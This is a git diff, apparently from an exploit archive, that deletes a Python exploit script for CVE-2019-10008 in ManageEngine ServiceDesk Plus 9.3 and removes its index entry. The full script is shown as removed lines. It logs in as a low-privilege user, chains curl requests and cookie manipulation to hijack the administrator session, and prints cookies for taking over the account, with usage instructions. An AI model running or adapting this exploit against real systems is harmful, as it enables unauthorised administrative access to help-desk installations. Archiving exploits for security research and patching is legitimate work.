diff --git a/exploits/windows/webapps/46659.py b/exploits/windows/webapps/46659.py
deleted file mode 100755
index f41dde33b..000000000
--- a/exploits/windows/webapps/46659.py
+++ /dev/null
@@ -1,180 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: Manage Engine ServiceDesk Plus Version 9.3 Privileged Account Hijacking
-# Date: 30-03-2019
-# Exploit Author: Ata Hakçıl, Melih Kaan Yıldız
-# Vendor: ManageEngine
-# Vendor Homepage: www.manageengine.com
-# Product: Service Desk Plus
-# Version: 9.3
-# Tested On: Windows 10 64 bit
-# CVE : 2019-10008
-
-
-# How to use: Change the host, low_username, low_password and high_username variables depending on what you have.
-# Low username and password is an account you have access to. high_username is account you want to authenticate as.
-
-# After running the script, it will output you the cookies that you can set on your browser to login to the high_username without password.
-# Run this script on a Linux OS.
-
-#Host ip address + port
-host="localhost:8080"
-
-#set to https if needed
-url = "http://" + host
-
-#Username with credentials you have
-low_username="guest"
-low_password="guest"
-
-#username you want to login as
-high_username="administrator"
-
-
-
-
-
-print("\033[1;37mUrl: \033[1;32m" + url)
-print("\033[1;37mUser with low priv: \033[1;32m" + low_username + ':' + low_password)
-print("\033[1;37mUser to bypass authentication to: \033[1;32m" + high_username)
-
-
-print("\033[1;32mGetting a session id\033[1;37m")
-
-# Get index page to capture a session id
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' -H $'Referer: "+url+"/' -H $'Connection: close'\
- $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-print("Sessid:")
-print(sessid)
-
-
-print("\033[1;31mLogging in with low privilege user\033[1;37m")
-
-
-#Attempt login post request
-curl="curl -i -s -k -X $'POST' -H $'Host: "+host+"'\
- -H $'Referer: "+url+"/'\
- -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
- -b $'JSESSIONID="+sessid+"' \
- --data-binary $'j_username="+low_username+"&j_password="+low_password+"&LDAPEnable=false&\
- hidden=Select+a+Domain&hidden=For+Domain&AdEnable=false&DomainCount=0&LocalAuth=No&LocalAuthWithDomain=No&\
- dynamicUserAddition_status=true&localAuthEnable=true&logonDomainName=-1&loginButton=Login&checkbox=checkbox' \
- $'"+url+"/j_security_check'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-
-#Instead of following redirects with -L, following manually because we don't need all the transactions.
-curl="curl -i -s -k -X $'GET' -H $'Host: "+host+"'\
- -H $'Referer: "+url+"/'\
- -H $'Connection: close' -H $'Cookie: JSESSIONID="+sessid+"' \
- -b $'JSESSIONID="+sessid+"' \
- $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-print("\033[1;32mCaptured authenticated cookies.\033[1;37m")
-sessid = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-print(sessid)
-sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-print(sessidsso)
-grbl = re.findall("(?<=Set-Cookie: )[^=]*=[^;]*",out)
-
-grbl2 = []
-for cookie in grbl:
- cl = cookie.split('=')
- if cl[0]!='JSESSIONID' and cl[0]!='JSESSIONIDSSO' and cl[0]!='_rem':
-
- grbl2.append(cl[0])
- grbl2.append(cl[1])
-
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' \
- -H $'Cookie: JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -b $'JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- $'"+url+"/mc/'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid2 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-print("\033[1;32mCaptured secondary sessid.\033[1;37m")
-print(sessid2)
-
-
-print("\033[1;31mDoing the magic step 1.\033[1;37m")
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' \
- -H $'Referer: "+url+"/mc/WOListView.do' \
- -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- $'"+url+"/mc/jsp/MCLogOut.jsp'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-print("\033[1;31mDoing the magic step 2.\033[1;37m")
-
-
-
-
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' \
- -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- $'"+url+"/mc/jsp/MCDashboard.jsp'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-sessid3 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-sessidsso = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-
-
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' \
- -H $'Cookie: JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -b $'JSESSIONID="+sessid2+"; JSESSIONID="+sessid+"; JSESSIONIDSSO="+sessidsso+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- $'"+url+"/'"
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-sessid4 = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-
-
-curl = "curl -i -s -k -X $'POST' \
- -H $'"+host+"' \
- -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
- -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- --data-binary $'j_username="+high_username+"&j_password=bypassingpass&DOMAIN_NAME=' \
- $'"+url+"/mc/j_security_check'"
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-curl = "curl -i -s -k -X $'GET' \
- -H $'Host: "+host+"' \
- -H $'Referer: "+url+"/mc/jsp/MCDashboard.jsp' \
- -H $'Cookie: JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- -H $'Upgrade-Insecure-Requests: 1' \
- -b $'JSESSIONID="+sessid3+"; JSESSIONID="+sessid4+"; _rem=true;"+grbl2[0]+"="+grbl2[1]+"; "+grbl2[2]+"="+grbl2[3]+"' \
- $'"+url+"/mc/jsp/MCDashboard.jsp'"
-
-
-
-out = os.popen('/bin/bash -c "' + curl+'"').read()
-
-
-sessidhigh = re.findall("(?<=Set-Cookie: JSESSIONID=)[^;]*",out)[0]
-sessidssohigh = re.findall("(?<=Set-Cookie: JSESSIONIDSSO=)[^;]*",out)[0]
-
-print("\033[1;31mCaptured target session.Set following cookies on your browser.\033[1;37m")
-print("JSESSIONID=" + sessidhigh)
-print("JSESSIONIDSSO=" + sessidssohigh)
-print(grbl2[0] + "=" + grbl2[1])
-print(grbl2[2] + "=" + grbl2[3])
-print("_rem=true")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 5a50ea2fd..281cb0a75 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -41112,7 +41112,6 @@ id,file,description,date,author,type,platform,port
 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
-46659,exploits/windows/webapps/46659.py,"Manage Engine ServiceDesk Plus 9.3 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,windows,
 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,
 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80
 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80